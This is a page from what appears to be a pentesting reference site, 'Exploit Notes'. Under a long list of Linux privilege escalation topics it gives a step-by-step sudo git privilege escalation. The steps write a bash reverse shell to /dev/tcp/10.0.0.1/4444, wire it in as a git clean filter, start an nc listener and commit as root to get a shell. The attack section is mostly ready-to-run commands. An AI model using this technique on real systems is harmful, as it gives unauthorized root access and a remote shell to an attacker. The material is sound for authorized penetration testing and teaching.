Exploit Notes
Exploit Notes

Exploits related to Linux

Privilege Escalation

Ansible Playbook Privilege Escalation
Apache Conf Privilege Escalation
Bash eq Privilege Escalation
Buffer Overflow Privilege Escalation
Chrome Remote Debugger Pentesting
Doas Privilege Escalation
LXC/LXD (Linux Container/Daemon) Privilege Escalation
Linux Privilege Escalation
Mozilla Pentesting
OpenSSL Privilege Escalation
PolKit Privilege Escalation
Privilege Escalation with Wildcard Injection
Python Privilege Escalation
Python Yaml Privilege Escalation
Ruby Privilege Escalation
Snapd Privilege Escalation
Sudo ClamAV Privilege Escalation
Sudo Dstat Privilege Escalation
Sudo Exiftool Privilege Escalation
Sudo Fail2ban Privilege Escalation
Sudo Git Privilege Escalation
Sudo Java Privilege Escalation
Sudo OpenVPN Privilege Escalation
Sudo Path Traversal Privilege Escalation
Sudo Privilege Escalation
Sudo Privilege Escalation by Overriding Shared Library
Sudo Reboot Privilege Escalation
Sudo Screen Privilege Escalation
Sudo Service Privilege Escalation
Sudo Shutdown, Poweroff Privilege Escalation
Sudo Systemctl Privilege Escalation
Sudo Tee Privilege Escalation
Sudo Umount Privilege Escalation
Sudo Vim Privilege Escalation
Sudo Wall Privilege Escalation
Sudo Wget Privilege Escalation
Sudoedit Privilege Escalation
Update-Motd Privilege Escalation

Post Exploitation

Linux Backdoors
Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Others

Archived Files
Linux Techniques
Linux Troubleshooting
Linux User & File Management
X11 (X Window System) Pentesting

Sudo Git Privilege Escalation

Last modified: 2023-03-12

Privilege Escalation

Sudo git is vulnerable to privilege escalation.

Investigation

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

If we can commit the git repository as root, we may be able to escalate privileges.


Exploitation

1. Create a Payload

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell

2. Set Git Config

# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell

3. Commit the Repository

Before committing, we need to start a listener in local machine.

nc -lvnp 4444

Then commit with sudo.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

Now we should get a shell in local terminal.

Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.